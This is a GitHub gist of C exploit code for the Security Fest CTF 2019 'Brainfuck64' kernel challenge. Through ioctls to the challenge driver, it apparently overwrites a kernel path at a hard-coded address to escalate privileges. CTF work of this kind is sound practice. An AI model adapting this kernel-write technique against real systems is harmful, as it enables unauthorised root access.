Skip to content

Instantly share code, notes, and snippets.

@hama7230
Created May 24, 2019 08:04
Show Gist options
  • Save hama7230/5213e430f53f8110e81837790fc242ad to your computer and use it in GitHub Desktop.
Save hama7230/5213e430f53f8110e81837790fc242ad to your computer and use it in GitHub Desktop.
Security Fest CTF 2019 Brainfuck64
#define O_RDONLY 0
#define O_RDWR 00000002
int read(int fd, char* buf, int len) {
__asm__("mov rax, 0");
__asm__("syscall");
}
int write(int fd, char* buf, int len) {
__asm__("mov rax, 1");
__asm__("syscall");
}
int open(char* filename, int flags) {
__asm__("mov rax, 2");
__asm__("syscall");
}
int close(int fd) {
__asm__("mov rax, 2");
__asm__("syscall");
}
void exit(int status) {
__asm__("mov rax, 60");
__asm__("syscall");
}
int ioctl(unsigned int fd, unsigned int cmd, unsigned long* arg) {
__asm__("mov rax, 16");
__asm__("syscall");
}
void memset(char* a, char b, int len) {
int i;
for (i=0; i<len; i++) {
a[i] = b;
}
}
int fd;
int dev_read(unsigned long *buf) {
return ioctl(fd, 0xD00DC0D3, buf);
}
int dev_write(unsigned long size) {
unsigned long buf[2];
buf[0] = 0x34364642;
buf[1] = size;
return ioctl(fd, 0xAC1DC0D3 , buf);
}
int exec_bf(unsigned long *buf) {
return ioctl(fd, 0xBAADC0D3, buf);
}
void _start(void){
fd = open("/dev/brainfuck64", O_RDWR);
if (fd < 0) {exit(1);}
dev_write(0x20);
char insts[500];
memset(insts, 0, 500);
memset(insts, '+', 7);
memset(insts+7, '<', 8);
memset(insts+0xf, '^', 1);
*(unsigned long*)&insts[0x10] = 0xffffffff81a3f7a0;
exec_bf(insts);
memset(insts, 0, 500);
memset(insts, '+', 7);
memset(insts+7, '^', 1);
*(unsigned long*)&insts[0x8] = 0x73752f656d6f682f;
memset(insts+0x10, '^', 1);
*(unsigned long*)&insts[0x11] = 0x612f7265;
exec_bf(insts);
exit(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment